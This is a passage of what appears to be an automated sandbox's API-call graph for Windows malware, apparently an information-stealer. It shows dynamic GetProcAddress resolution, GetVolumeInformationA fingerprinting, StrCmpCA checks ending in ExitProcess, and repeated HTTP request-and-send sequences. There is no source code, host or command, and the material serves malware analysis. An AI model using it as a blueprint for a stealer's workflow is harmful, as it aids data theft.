2 API calls 13746->13747 13748 343046 13747->13748 13749 3445c0 2 API calls 13748->13749 13750 34305f 13749->13750 13751 3445c0 2 API calls 13750->13751 13752 343078 13751->13752 13753 3445c0 2 API calls 13752->13753 13754 343091 13753->13754 13755 3445c0 2 API calls 13754->13755 13756 3430aa 13755->13756 13757 3445c0 2 API calls 13756->13757 13758 3430c3 13757->13758 13759 3445c0 2 API calls 13758->13759 13760 3430dc 13759->13760 13761 3445c0 2 API calls 13760->13761 13762 3430f5 13761->13762 13763 3445c0 2 API calls 13762->13763 13764 34310e 13763->13764 13765 3445c0 2 API calls 13764->13765 13766 343127 13765->13766 13767 3445c0 2 API calls 13766->13767 13768 343140 13767->13768 13769 3445c0 2 API calls 13768->13769 13770 343159 13769->13770 13771 3445c0 2 API calls 13770->13771 13772 343172 13771->13772 13773 3445c0 2 API calls 13772->13773 13774 34318b 13773->13774 13775 3445c0 2 API calls 13774->13775 13776 3431a4 13775->13776 13777 3445c0 2 API calls 13776->13777 13778 3431bd 13777->13778 13779 3445c0 2 API calls 13778->13779 13780 3431d6 13779->13780 13781 3445c0 2 API calls 13780->13781 13782 3431ef 13781->13782 13783 3445c0 2 API calls 13782->13783 13784 343208 13783->13784 13785 3445c0 2 API calls 13784->13785 13786 343221 13785->13786 13787 3445c0 2 API calls 13786->13787 13788 34323a 13787->13788 13789 3445c0 2 API calls 13788->13789 13790 343253 13789->13790 13791 3445c0 2 API calls 13790->13791 13792 34326c 13791->13792 13793 3445c0 2 API calls 13792->13793 13794 343285 13793->13794 13795 3445c0 2 API calls 13794->13795 13796 34329e 13795->13796 13797 3445c0 2 API calls 13796->13797 13798 3432b7 13797->13798 13799 3445c0 2 API calls 13798->13799 13800 3432d0 13799->13800 13801 3445c0 2 API calls 13800->13801 13802 3432e9 13801->13802 13803 3445c0 2 API calls 13802->13803 13804 343302 13803->13804 13805 3445c0 2 API calls 13804->13805 13806 34331b 13805->13806 13807 3445c0 2 API calls 13806->13807 13808 343334 13807->13808 13809 3445c0 2 API calls 13808->13809 13810 34334d 13809->13810 13811 3445c0 2 API calls 13810->13811 13812 343366 13811->13812 13813 3445c0 2 API calls 13812->13813 13814 34337f 13813->13814 13815 3445c0 2 API calls 13814->13815 13816 343398 13815->13816 13817 3445c0 2 API calls 13816->13817 13818 3433b1 13817->13818 13819 3445c0 2 API calls 13818->13819 13820 3433ca 13819->13820 13821 3445c0 2 API calls 13820->13821 13822 3433e3 13821->13822 13823 3445c0 2 API calls 13822->13823 13824 3433fc 13823->13824 13825 3445c0 2 API calls 13824->13825 13826 343415 13825->13826 13827 3445c0 2 API calls 13826->13827 13828 34342e 13827->13828 13829 3445c0 2 API calls 13828->13829 13830 343447 13829->13830 13831 3445c0 2 API calls 13830->13831 13832 343460 13831->13832 13833 3445c0 2 API calls 13832->13833 13834 343479 13833->13834 13835 3445c0 2 API calls 13834->13835 13836 343492 13835->13836 13837 3445c0 2 API calls 13836->13837 13838 3434ab 13837->13838 13839 3445c0 2 API calls 13838->13839 13840 3434c4 13839->13840 13841 3445c0 2 API calls 13840->13841 13842 3434dd 13841->13842 13843 3445c0 2 API calls 13842->13843 13844 3434f6 13843->13844 13845 3445c0 2 API calls 13844->13845 13846 34350f 13845->13846 13847 3445c0 2 API calls 13846->13847 13848 343528 13847->13848 13849 3445c0 2 API calls 13848->13849 13850 343541 13849->13850 13851 3445c0 2 API calls 13850->13851 13852 34355a 13851->13852 13853 3445c0 2 API calls 13852->13853 13854 343573 13853->13854 13855 3445c0 2 API calls 13854->13855 13856 34358c 13855->13856 13857 3445c0 2 API calls 13856->13857 13858 3435a5 13857->13858 13859 3445c0 2 API calls 13858->13859 13860 3435be 13859->13860 13861 3445c0 2 API calls 13860->13861 13862 3435d7 13861->13862 13863 3445c0 2 API calls 13862->13863 13864 3435f0 13863->13864 13865 3445c0 2 API calls 13864->13865 13866 343609 13865->13866 13867 3445c0 2 API calls 13866->13867 13868 343622 13867->13868 13869 3445c0 2 API calls 13868->13869 13870 34363b 13869->13870 13871 3445c0 2 API calls 13870->13871 13872 343654 13871->13872 13873 3445c0 2 API calls 13872->13873 13874 34366d 13873->13874 13875 3445c0 2 API calls 13874->13875 13876 343686 13875->13876 13877 3445c0 2 API calls 13876->13877 13878 34369f 13877->13878 13879 3445c0 2 API calls 13878->13879 13880 3436b8 13879->13880 13881 3445c0 2 API calls 13880->13881 13882 3436d1 13881->13882 13883 3445c0 2 API calls 13882->13883 13884 3436ea 13883->13884 13885 3445c0 2 API calls 13884->13885 13886 343703 13885->13886 13887 3445c0 2 API calls 13886->13887 13888 34371c 13887->13888 13889 3445c0 2 API calls 13888->13889 13890 343735 13889->13890 13891 3445c0 2 API calls 13890->13891 13892 34374e 13891->13892 13893 3445c0 2 API calls 13892->13893 13894 343767 13893->13894 13895 3445c0 2 API calls 13894->13895 13896 343780 13895->13896 13897 3445c0 2 API calls 13896->13897 13898 343799 13897->13898 13899 3445c0 2 API calls 13898->13899 13900 3437b2 13899->13900 13901 3445c0 2 API calls 13900->13901 13902 3437cb 13901->13902 13903 3445c0 2 API calls 13902->13903 13904 3437e4 13903->13904 13905 3445c0 2 API calls 13904->13905 13906 3437fd 13905->13906 13907 3445c0 2 API calls 13906->13907 13908 343816 13907->13908 13909 3445c0 2 API calls 13908->13909 13910 34382f 13909->13910 13911 3445c0 2 API calls 13910->13911 13912 343848 13911->13912 13913 3445c0 2 API calls 13912->13913 13914 343861 13913->13914 13915 3445c0 2 API calls 13914->13915 13916 34387a 13915->13916 13917 3445c0 2 API calls 13916->13917 13918 343893 13917->13918 13919 3445c0 2 API calls 13918->13919 13920 3438ac 13919->13920 13921 3445c0 2 API calls 13920->13921 13922 3438c5 13921->13922 13923 3445c0 2 API calls 13922->13923 13924 3438de 13923->13924 13925 3445c0 2 API calls 13924->13925 13926 3438f7 13925->13926 13927 3445c0 2 API calls 13926->13927 13928 343910 13927->13928 13929 3445c0 2 API calls 13928->13929 13930 343929 13929->13930 13931 3445c0 2 API calls 13930->13931 13932 343942 13931->13932 13933 3445c0 2 API calls 13932->13933 13934 34395b 13933->13934 13935 3445c0 2 API calls 13934->13935 13936 343974 13935->13936 13937 3445c0 2 API calls 13936->13937 13938 34398d 13937->13938 13939 3445c0 2 API calls 13938->13939 13940 3439a6 13939->13940 13941 3445c0 2 API calls 13940->13941 13942 3439bf 13941->13942 13943 3445c0 2 API calls 13942->13943 13944 3439d8 13943->13944 13945 3445c0 2 API calls 13944->13945 13946 3439f1 13945->13946 13947 3445c0 2 API calls 13946->13947 13948 343a0a 13947->13948 13949 3445c0 2 API calls 13948->13949 13950 343a23 13949->13950 13951 3445c0 2 API calls 13950->13951 13952 343a3c 13951->13952 13953 3445c0 2 API calls 13952->13953 13954 343a55 13953->13954 13955 3445c0 2 API calls 13954->13955 13956 343a6e 13955->13956 13957 3445c0 2 API calls 13956->13957 13958 343a87 13957->13958 13959 3445c0 2 API calls 13958->13959 13960 343aa0 13959->13960 13961 3445c0 2 API calls 13960->13961 13962 343ab9 13961->13962 13963 3445c0 2 API calls 13962->13963 13964 343ad2 13963->13964 13965 3445c0 2 API calls 13964->13965 13966 343aeb 13965->13966 13967 3445c0 2 API calls 13966->13967 13968 343b04 13967->13968 13969 3445c0 2 API calls 13968->13969 13970 343b1d 13969->13970 13971 3445c0 2 API calls 13970->13971 13972 343b36 13971->13972 13973 3445c0 2 API calls 13972->13973 13974 343b4f 13973->13974 13975 3445c0 2 API calls 13974->13975 13976 343b68 13975->13976 13977 3445c0 2 API calls 13976->13977 13978 343b81 13977->13978 13979 3445c0 2 API calls 13978->13979 13980 343b9a 13979->13980 13981 3445c0 2 API calls 13980->13981 13982 343bb3 13981->13982 13983 3445c0 2 API calls 13982->13983 13984 343bcc 13983->13984 13985 3445c0 2 API calls 13984->13985 13986 343be5 13985->13986 13987 3445c0 2 API calls 13986->13987 13988 343bfe 13987->13988 13989 3445c0 2 API calls 13988->13989 13990 343c17 13989->13990 13991 3445c0 2 API calls 13990->13991 13992 343c30 13991->13992 13993 3445c0 2 API calls 13992->13993 13994 343c49 13993->13994 13995 3445c0 2 API calls 13994->13995 13996 343c62 13995->13996 13997 3445c0 2 API calls 13996->13997 13998 343c7b 13997->13998 13999 3445c0 2 API calls 13998->13999 14000 343c94 13999->14000 14001 3445c0 2 API calls 14000->14001 14002 343cad 14001->14002 14003 3445c0 2 API calls 14002->14003 14004 343cc6 14003->14004 14005 3445c0 2 API calls 14004->14005 14006 343cdf 14005->14006 14007 3445c0 2 API calls 14006->14007 14008 343cf8 14007->14008 14009 3445c0 2 API calls 14008->14009 14010 343d11 14009->14010 14011 3445c0 2 API calls 14010->14011 14012 343d2a 14011->14012 14013 3445c0 2 API calls 14012->14013 14014 343d43 14013->14014 14015 3445c0 2 API calls 14014->14015 14016 343d5c 14015->14016 14017 3445c0 2 API calls 14016->14017 14018 343d75 14017->14018 14019 3445c0 2 API calls 14018->14019 14020 343d8e 14019->14020 14021 3445c0 2 API calls 14020->14021 14022 343da7 14021->14022 14023 3445c0 2 API calls 14022->14023 14024 343dc0 14023->14024 14025 3445c0 2 API calls 14024->14025 14026 343dd9 14025->14026 14027 3445c0 2 API calls 14026->14027 14028 343df2 14027->14028 14029 3445c0 2 API calls 14028->14029 14030 343e0b 14029->14030 14031 3445c0 2 API calls 14030->14031 14032 343e24 14031->14032 14033 3445c0 2 API calls 14032->14033 14034 343e3d 14033->14034 14035 3445c0 2 API calls 14034->14035 14036 343e56 14035->14036 14037 3445c0 2 API calls 14036->14037 14038 343e6f 14037->14038 14039 3445c0 2 API calls 14038->14039 14040 343e88 14039->14040 14041 3445c0 2 API calls 14040->14041 14042 343ea1 14041->14042 14043 3445c0 2 API calls 14042->14043 14044 343eba 14043->14044 14045 3445c0 2 API calls 14044->14045 14046 343ed3 14045->14046 14047 3445c0 2 API calls 14046->14047 14048 343eec 14047->14048 14049 3445c0 2 API calls 14048->14049 14050 343f05 14049->14050 14051 3445c0 2 API calls 14050->14051 14052 343f1e 14051->14052 14053 3445c0 2 API calls 14052->14053 14054 343f37 14053->14054 14055 3445c0 2 API calls 14054->14055 14056 343f50 14055->14056 14057 3445c0 2 API calls 14056->14057 14058 343f69 14057->14058 14059 3445c0 2 API calls 14058->14059 14060 343f82 14059->14060 14061 3445c0 2 API calls 14060->14061 14062 343f9b 14061->14062 14063 3445c0 2 API calls 14062->14063 14064 343fb4 14063->14064 14065 3445c0 2 API calls 14064->14065 14066 343fcd 14065->14066 14067 3445c0 2 API calls 14066->14067 14068 343fe6 14067->14068 14069 3445c0 2 API calls 14068->14069 14070 343fff 14069->14070 14071 3445c0 2 API calls 14070->14071 14072 344018 14071->14072 14073 3445c0 2 API calls 14072->14073 14074 344031 14073->14074 14075 3445c0 2 API calls 14074->14075 14076 34404a 14075->14076 14077 3445c0 2 API calls 14076->14077 14078 344063 14077->14078 14079 3445c0 2 API calls 14078->14079 14080 34407c 14079->14080 14081 3445c0 2 API calls 14080->14081 14082 344095 14081->14082 14083 3445c0 2 API calls 14082->14083 14084 3440ae 14083->14084 14085 3445c0 2 API calls 14084->14085 14086 3440c7 14085->14086 14087 3445c0 2 API calls 14086->14087 14088 3440e0 14087->14088 14089 3445c0 2 API calls 14088->14089 14090 3440f9 14089->14090 14091 3445c0 2 API calls 14090->14091 14092 344112 14091->14092 14093 3445c0 2 API calls 14092->14093 14094 34412b 14093->14094 14095 3445c0 2 API calls 14094->14095 14096 344144 14095->14096 14097 3445c0 2 API calls 14096->14097 14098 34415d 14097->14098 14099 3445c0 2 API calls 14098->14099 14100 344176 14099->14100 14101 3445c0 2 API calls 14100->14101 14102 34418f 14101->14102 14103 3445c0 2 API calls 14102->14103 14104 3441a8 14103->14104 14105 3445c0 2 API calls 14104->14105 14106 3441c1 14105->14106 14107 3445c0 2 API calls 14106->14107 14108 3441da 14107->14108 14109 3445c0 2 API calls 14108->14109 14110 3441f3 14109->14110 14111 3445c0 2 API calls 14110->14111 14112 34420c 14111->14112 14113 3445c0 2 API calls 14112->14113 14114 344225 14113->14114 14115 3445c0 2 API calls 14114->14115 14116 34423e 14115->14116 14117 3445c0 2 API calls 14116->14117 14118 344257 14117->14118 14119 3445c0 2 API calls 14118->14119 14120 344270 14119->14120 14121 3445c0 2 API calls 14120->14121 14122 344289 14121->14122 14123 3445c0 2 API calls 14122->14123 14124 3442a2 14123->14124 14125 3445c0 2 API calls 14124->14125 14126 3442bb 14125->14126 14127 3445c0 2 API calls 14126->14127 14128 3442d4 14127->14128 14129 3445c0 2 API calls 14128->14129 14130 3442ed 14129->14130 14131 3445c0 2 API calls 14130->14131 14132 344306 14131->14132 14133 3445c0 2 API calls 14132->14133 14134 34431f 14133->14134 14135 3445c0 2 API calls 14134->14135 14136 344338 14135->14136 14137 3445c0 2 API calls 14136->14137 14138 344351 14137->14138 14139 3445c0 2 API calls 14138->14139 14140 34436a 14139->14140 14141 3445c0 2 API calls 14140->14141 14142 344383 14141->14142 14143 3445c0 2 API calls 14142->14143 14144 34439c 14143->14144 14145 3445c0 2 API calls 14144->14145 14146 3443b5 14145->14146 14147 3445c0 2 API calls 14146->14147 14148 3443ce 14147->14148 14149 3445c0 2 API calls 14148->14149 14150 3443e7 14149->14150 14151 3445c0 2 API calls 14150->14151 14152 344400 14151->14152 14153 3445c0 2 API calls 14152->14153 14154 344419 14153->14154 14155 3445c0 2 API calls 14154->14155 14156 344432 14155->14156 14157 3445c0 2 API calls 14156->14157 14158 34444b 14157->14158 14159 3445c0 2 API calls 14158->14159 14160 344464 14159->14160 14161 3445c0 2 API calls 14160->14161 14162 34447d 14161->14162 14163 3445c0 2 API calls 14162->14163 14164 344496 14163->14164 14165 3445c0 2 API calls 14164->14165 14166 3444af 14165->14166 14167 3445c0 2 API calls 14166->14167 14168 3444c8 14167->14168 14169 3445c0 2 API calls 14168->14169 14170 3444e1 14169->14170 14171 3445c0 2 API calls 14170->14171 14172 3444fa 14171->14172 14173 3445c0 2 API calls 14172->14173 14174 344513 14173->14174 14175 3445c0 2 API calls 14174->14175 14176 34452c 14175->14176 14177 3445c0 2 API calls 14176->14177 14178 344545 14177->14178 14179 3445c0 2 API calls 14178->14179 14180 34455e 14179->14180 14181 3445c0 2 API calls 14180->14181 14182 344577 14181->14182 14183 3445c0 2 API calls 14182->14183 14184 344590 14183->14184 14185 3445c0 2 API calls 14184->14185 14186 3445a9 14185->14186 14187 359c10 14186->14187 14188 35a036 8 API calls 14187->14188 14189 359c20 43 API calls 14187->14189 14190 35a146 14188->14190 14191 35a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14188->14191 14189->14188 14192 35a216 14190->14192 14193 35a153 8 API calls 14190->14193 14191->14190 14194 35a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14192->14194 14195 35a298 14192->14195 14193->14192 14194->14195 14196 35a2a5 6 API calls 14195->14196 14197 35a337 14195->14197 14196->14197 14198 35a344 9 API calls 14197->14198 14199 35a41f 14197->14199 14198->14199 14200 35a4a2 14199->14200 14201 35a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14199->14201 14202 35a4dc 14200->14202 14203 35a4ab GetProcAddress GetProcAddress 14200->14203 14201->14200 14204 35a515 14202->14204 14205 35a4e5 GetProcAddress GetProcAddress 14202->14205 14203->14202 14206 35a612 14204->14206 14207 35a522 10 API calls 14204->14207 14205->14204 14208 35a67d 14206->14208 14209 35a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14206->14209 14207->14206 14210 35a686 GetProcAddress 14208->14210 14211 35a69e 14208->14211 14209->14208 14210->14211 14212 35a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14211->14212 14213 355ca3 14211->14213 14212->14213 14214 341590 14213->14214 15335 341670 14214->15335 14217 35a7a0 lstrcpy 14218 3415b5 14217->14218 14219 35a7a0 lstrcpy 14218->14219 14220 3415c7 14219->14220 14221 35a7a0 lstrcpy 14220->14221 14222 3415d9 14221->14222 14223 35a7a0 lstrcpy 14222->14223 14224 341663 14223->14224 14225 355510 14224->14225 14226 355521 14225->14226 14227 35a820 2 API calls 14226->14227 14228 35552e 14227->14228 14229 35a820 2 API calls 14228->14229 14230 35553b 14229->14230 14231 35a820 2 API calls 14230->14231 14232 355548 14231->14232 14233 35a740 lstrcpy 14232->14233 14234 355555 14233->14234 14235 35a740 lstrcpy 14234->14235 14236 355562 14235->14236 14237 35a740 lstrcpy 14236->14237 14238 35556f 14237->14238 14239 35a740 lstrcpy 14238->14239 14279 35557c 14239->14279 14240 35a740 lstrcpy 14240->14279 14241 35a820 lstrlen lstrcpy 14241->14279 14242 355643 StrCmpCA 14242->14279 14243 3556a0 StrCmpCA 14244 3557dc 14243->14244 14243->14279 14245 35a8a0 lstrcpy 14244->14245 14246 3557e8 14245->14246 14247 35a820 2 API calls 14246->14247 14250 3557f6 14247->14250 14248 355856 StrCmpCA 14251 355991 14248->14251 14248->14279 14249 3551f0 20 API calls 14249->14279 14252 35a820 2 API calls 14250->14252 14254 35a8a0 lstrcpy 14251->14254 14253 355805 14252->14253 14255 341670 lstrcpy 14253->14255 14256 35599d 14254->14256 14278 355811 14255->14278 14257 35a820 2 API calls 14256->14257 14260 3559ab 14257->14260 14258 355a0b StrCmpCA 14262 355a16 Sleep 14258->14262 14263 355a28 14258->14263 14259 3552c0 25 API calls 14259->14279 14261 35a820 2 API calls 14260->14261 14264 3559ba 14261->14264 14262->14279 14265 35a8a0 lstrcpy 14263->14265 14266 341670 lstrcpy 14264->14266 14267 355a34 14265->14267 14266->14278 14268 35a820 2 API calls 14267->14268 14269 355a43 14268->14269 14270 35a820 2 API calls 14269->14270 14271 355a52 14270->14271 14273 341670 lstrcpy 14271->14273 14272 35578a StrCmpCA 14272->14279 14273->14278 14274 35a7a0 lstrcpy 14274->14279 14275 35593f StrCmpCA 14275->14279 14276 35a8a0 lstrcpy 14276->14279 14277 341590 lstrcpy 14277->14279 14278->13332 14279->14240 14279->14241 14279->14242 14279->14243 14279->14248 14279->14249 14279->14258 14279->14259 14279->14272 14279->14274 14279->14275 14279->14276 14279->14277 14281 357553 GetVolumeInformationA 14280->14281 14282 35754c 14280->14282 14283 357591 14281->14283 14282->14281 14284 3575fc GetProcessHeap RtlAllocateHeap 14283->14284 14285 357619 14284->14285 14286 357628 wsprintfA 14284->14286 14287 35a740 lstrcpy 14285->14287 14288 35a740 lstrcpy 14286->14288 14289 355da7 14287->14289 14288->14289 14289->13353 14291 35a7a0 lstrcpy 14290->14291 14292 344899 14291->14292 15344 3447b0 14292->15344 14294 3448a5 14295 35a740 lstrcpy 14294->14295 14296 3448d7 14295->14296 14297 35a740 lstrcpy 14296->14297 14298 3448e4 14297->14298 14299 35a740 lstrcpy 14298->14299 14300 3448f1 14299->14300 14301 35a740 lstrcpy 14300->14301 14302 3448fe 14301->14302 14303 35a740 lstrcpy 14302->14303 14304 34490b InternetOpenA StrCmpCA 14303->14304 14305 344944 14304->14305 14306 344ecb InternetCloseHandle 14305->14306 15350 358b60 14305->15350 14307 344ee8 14306->14307 15365 349ac0 CryptStringToBinaryA 14307->15365 14309 344963 15358 35a920 14309->15358 14312 344976 14314 35a8a0 lstrcpy 14312->14314 14319 34497f 14314->14319 14315 35a820 2 API calls 14316 344f05 14315->14316 14318 35a9b0 4 API calls 14316->14318 14317 344f27 ctype 14321 35a7a0 lstrcpy 14317->14321 14320 344f1b 14318->14320 14323 35a9b0 4 API calls 14319->14323 14322 35a8a0 lstrcpy 14320->14322 14334 344f57 14321->14334 14322->14317 14324 3449a9 14323->14324 14325 35a8a0 lstrcpy 14324->14325 14326 3449b2 14325->14326 14327 35a9b0 4 API calls 14326->14327 14328 3449d1 14327->14328 14329 35a8a0 lstrcpy 14328->14329 14330 3449da 14329->14330 14331 35a920 3 API calls 14330->14331 14332 3449f8 14331->14332 14333 35a8a0 lstrcpy 14332->14333 14335 344a01 14333->14335 14334->13356 14336 35a9b0 4 API calls 14335->14336 14337 344a20 14336->14337 14338 35a8a0 lstrcpy 14337->14338 14339 344a29 14338->14339 14340 35a9b0 4 API calls 14339->14340 14341 344a48 14340->14341 14342 35a8a0 lstrcpy 14341->14342 14343 344a51 14342->14343 14344 35a9b0 4 API calls 14343->14344 14345 344a7d 14344->14345 14346 35a920 3 API calls 14345->14346 14347 344a84 14346->14347 14348 35a8a0 lstrcpy 14347->14348 14349 344a8d 14348->14349 14350 344aa3 InternetConnectA 14349->14350 14350->14306 14351 344ad3 HttpOpenRequestA 14350->14351 14353 344ebe InternetCloseHandle 14351->14353 14354 344b28 14351->14354 14353->14306 14355 35a9b0 4 API calls 14354->14355 14356 344b3c 14355->14356 14357 35a8a0 lstrcpy 14356->14357 14358 344b45 14357->14358 14359 35a920 3 API calls 14358->14359 14360 344b63 14359->14360 14361 35a8a0 lstrcpy 14360->14361 14362 344b6c 14361->14362 14363 35a9b0 4 API calls 14362->14363 14364 344b8b 14363->14364 14365 35a8a0 lstrcpy 14364->14365 14366 344b94 14365->14366 14367 35a9b0 4 API calls 14366->14367 14368 344bb5 14367->14368 14369 35a8a0 lstrcpy 14368->14369 14370 344bbe 14369->14370 14371 35a9b0 4 API calls 14370->14371 14372 344bde 14371->14372 14373 35a8a0 lstrcpy 14372->14373 14374 344be7 14373->14374 14375 35a9b0 4 API calls 14374->14375 14376 344c06 14375->14376 14377 35a8a0 lstrcpy 14376->14377 14378 344c0f 14377->14378 14379 35a920 3 API calls 14378->14379 14380 344c2d 14379->14380 14381 35a8a0 lstrcpy 14380->14381 14382 344c36 14381->14382 14383 35a9b0 4 API calls 14382->14383 14384 344c55 14383->14384 14385 35a8a0 lstrcpy 14384->14385 14386 344c5e 14385->14386 14387 35a9b0 4 API calls 14386->14387 14388 344c7d 14387->14388 14389 35a8a0 lstrcpy 14388->14389 14390 344c86 14389->14390 14391 35a920 3 API calls 14390->14391 14392 344ca4 14391->14392 14393 35a8a0 lstrcpy 14392->14393 14394 344cad 14393->14394 14395 35a9b0 4 API calls 14394->14395 14396 344ccc 14395->14396 14397 35a8a0 lstrcpy 14396->14397 14398 344cd5 14397->14398 14399 35a9b0 4 API calls 14398->14399 14400 344cf6 14399->14400 14401 35a8a0 lstrcpy 14400->14401 14402 344cff 14401->14402 14403 35a9b0 4 API calls 14402->14403 14404 344d1f 14403->14404 14405 35a8a0 lstrcpy 14404->14405 14406 344d28 14405->14406 14407 35a9b0 4 API calls 14406->14407 14408 344d47 14407->14408 14409 35a8a0 lstrcpy 14408->14409 14410 344d50 14409->14410 14411 35a920 3 API calls 14410->14411 14412 344d6e 14411->14412 14413 35a8a0 lstrcpy 14412->14413 14414 344d77 14413->14414 14415 35a740 lstrcpy 14414->14415 14416 344d92 14415->14416 14417 35a920 3 API calls 14416->14417 14418 344db3 14417->14418 14419 35a920 3 API calls 14418->14419 14420 344dba 14419->14420 14421 35a8a0 lstrcpy 14420->14421 14422 344dc6 14421->14422 14423 344de7 lstrlen 14422->14423 14424 344dfa 14423->14424 14425 344e03 lstrlen 14424->14425 15364 35aad0 14425->15364 14427 344e13 HttpSendRequestA 14428 344e32 InternetReadFile 14427->14428 14429 344e67 InternetCloseHandle 14428->14429 14434 344e5e 14428->14434 14432 35a800 14429->14432 14431 35a9b0 4 API calls 14431->14434 14432->14353 14433 35a8a0 lstrcpy 14433->14434 14434->14428 14434->14429 14434->14431 14434->14433 15371 35aad0 14435->15371 14437 3517c4 StrCmpCA 14438 3517d7 14437->14438 14439 3517cf ExitProcess 14437->14439 14440 3519c2 14438->14440 14441 3518f1 StrCmpCA 14438->14441 14442 351951 StrCmpCA 14438->14442 14443 351970 StrCmpCA 14438->14443 14444 351913 StrCmpCA 14438->14444 14445 351932 StrCmpCA 14438->14445 14446 35185d StrCmpCA 14438->14446 14447 35187f StrCmpCA 14438->14447 14448 3518ad StrCmpCA 14438->14448 14449 3518cf StrCmpCA 14438->14449 14450 35a820 lstrlen lstrcpy 14438->14450 14440->13358 14441->14438 14442->14438 14443->14438 14444->14438 14445->14438 14446->14438 14447->14438 14448->14438 14449->14438 14450->14438 14452 35a7a0 lstrcpy 14451->14452 14453 345979 14452->14453 14454 3447b0 2 API calls 14453->14454 14455 345985 14454->14455 14456 35a740 lstrcpy 14455->14456 14457 3459ba 14456->14457 14458 35a740 lstrcpy 14457->14458 14459 3459c7 14458->14459 14460 35a740 lstrcpy 14459->14460 14461 3459d4 14460->14461 14462 35a740 lstrcpy 14461->14462 14463 3459e1 14462->14463 14464 35a740 lstrcpy 14463->14464 14465 3459ee InternetOpenA StrCmpCA 14464->14465 14466 345a1d 14465->14466 14467 345fc3 InternetCloseHandle 14466->14467 14468 358b60 3 API calls 14466->14468 14469 345fe0 14467->14469 14470 345a3c 14468->14470 14472 349ac0 4 API calls 14469->14472 14471 35a920 3 API calls 14470->14471 14473 345a4f 14471->14473 14474 345fe6 14472->14474 14475 35a8a0 lstrcpy 14473->14475 14476 35a820 2 API calls 14474->14476 14479 34601f ctype 14474->14479 14481 345a58 14475->14481 14477 345ffd 14476->14477 14478 35a9b0 4 API calls 14477->14478 14480 346013 14478->14480 14483 35a7a0 lstrcpy 14479->14483 14482 35a8a0 lstrcpy 14480->14482 14484 35a9b0 4 API calls 14481->14484 14482->14479 14492 34604f 14483->14492 14485 345a82 14484->14485 14486 35a8a0 lstrcpy 14485->14486 14487 345a8b 14486->14487 14488 35a9b0 4 API calls 14487->14488 14489 345aaa 14488->14489 14490 35a8a0 lstrcpy 14489->14490 14491 345ab3 14490->14491 14493 35a920 3 API calls 14491->14493 14492->13364 14494 345ad1 14493->14494 14495 35a8a0 lstrcpy 14494->14495 14496 345ada 14495->14496 14497 35a9b0 4 API calls 14496->14497 14498 345af9 14497->14498 14499 35a8a0 lstrcpy 14498->14499 14500 345b02 14499->14500 14501 35a9b0 4 API calls 14500->14501 14502 345b21 14501->14502 14503 35a8a0 lstrcpy 14502->14503 14504 345b2a 14503->14504 14505 35a9b0 4 API calls 14504->14505 14506 345b56 14505->14506 14507 35a920 3 API calls 14506->14507 14508 345b5d 14507->14508 14509 35a8a0 lstrcpy 14508->14509 14510 345b66 14509->14510 14511 345b7c InternetConnectA 14510->14511 14511->14467 14512 345bac HttpOpenRequestA 14511->14512 14514 345fb6 InternetCloseHandle 14512->14514 14515 345c0b 14512->14515 14514->14467 14516 35a9b0 4 API calls 14515->14516 14517 345c1f 14516->14517 14518 35a8a0 lstrcpy 14517->14518 14519 345c28 14518->14519 14520 35a920 3 API calls 14519->14520 14521 345c46 14520->14521 14522 35a8a0 lstrcpy 14521->14522 14523 345c4f 14522->14523 14524 35a9b0 4 API calls 14523->14524 14525 345c6e 14524->14525 14526 35a8a0 lstrcpy 14525->14526 14527 345c77 14526->14527 14528 35a9b0 4 API calls 14527->14528 14529 345c98 14528->14529 14530 35a8a0 lstrcpy 14529->14530 14531 345ca1 14530->14531 14532 35a9b0 4 API calls 14531->14532 14533 345cc1 14532->14533 14534 35a8a0 lstrcpy 14533->14534 14535 345cca 14534->14535 14536 35a9b0 4 API calls 14535->14536 14537 345ce9 14536->14537 14538 35a8a0 lstrcpy 14537->14538 14539 345cf2 14538->14539 14540 35a920 3 API calls 14539->14540 14541 345d10 14540->14541 14542 35a8a0 lstrcpy 14541->14542 14543 345d19 14542->14543 14544 35a9b0 4 API calls 14543->14544 14545 345d38 14544->14545 14546 35a8a0 lstrcpy 14545->14546 14547 345d41 14546->14547 14548 35a9b0 4 API calls 14547->14548 14549 345d60 14548->14549 14550 35a8a0 lstrcpy 14549->14550 14551 345d69 14550->14551 14552 35a920 3 API calls 14551->14552 14553 345d87 14552->14553 14554 35a8a0 lstrcpy 14553->14554 14555 345d90 14554->14555 14556 35a9b0 4 API calls 14555->14556 14557 345daf 14556->14557 14558 35a8a0 lstrcpy 14557->14558 14559 345db8 14558->14559 14560 35a9b0 4 API calls 14559->14560 14561 345dd9 14560->14561 14562 35a8a0 lstrcpy 14561->14562 14563 345de2 14562->14563 14564 35a9b0 4 API calls 14563->14564 14565 345e02 14564->14565 14566 35a8a0 lstrcpy 14565->14566 14567 345e0b 14566->14567 14568 35a9b0 4 API calls 14567->14568 14569 345e2a 14568->14569 14570 35a8a0 lstrcpy 14569->14570 14571 345e33 14570->14571 14572 35a920 3 API calls 14571->14572 14573 345e54 14572->14573 14574 35a8a0 lstrcpy 14573->14574 14575 345e5d 14574->14575 14576 345e70 lstrlen 14575->14576 15372 35aad0 14576->15372 14578 345e81 lstrlen GetProcessHeap RtlAllocateHeap 15373 35aad0 14578->15373 14580 345eae lstrlen 14581 345ebe 14580->14581 14582 345ed7 lstrlen 14581->14582 14583 345ee7 14582->14583 14584 345ef0 lstrlen 14583->14584 14585 345f04 14584->14585 14586 345f1a lstrlen 14585->14586 15374 35aad0 14586->15374 14588 345f2a HttpSendRequestA 14589 345f35 InternetReadFile 14588->14589 14590 345f6a InternetCloseHandle 14589->14590 14594 345f61 14589->14594 14590->14514 14592 35a9b0 4 API calls 14592->14594 14593 35a8a0 lstrcpy 14593->14594 14594->14589 14594->14590 14594->14592 14594->14593 14597 351077 14595->14597 14596 351151 14596->13366 14597->14596 14598 35a820 lstrlen lstrcpy 14597->14598 14598->14597 14600 350db7 14599->14600 14601 350f17 14600->14601 14602 350ea4 StrCmpCA 14600->14602 14603 350e27 StrCmpCA 14600->14603 14604 350e67 StrCmpCA 14600->14604 14605 35a820 lstrlen lstrcpy 14600->14605 14601->13374 14602->14600 14603->14600 14604->14600 14605->14600 14610 350f67 14606->14610 14607 351044 14607->13382 14608 350fb2 StrCmpCA 14608->14610 14609 35a820 lstrlen lstrcpy 14609->14610 14610->14607 14610->14608 14610->14609 14612 35a740 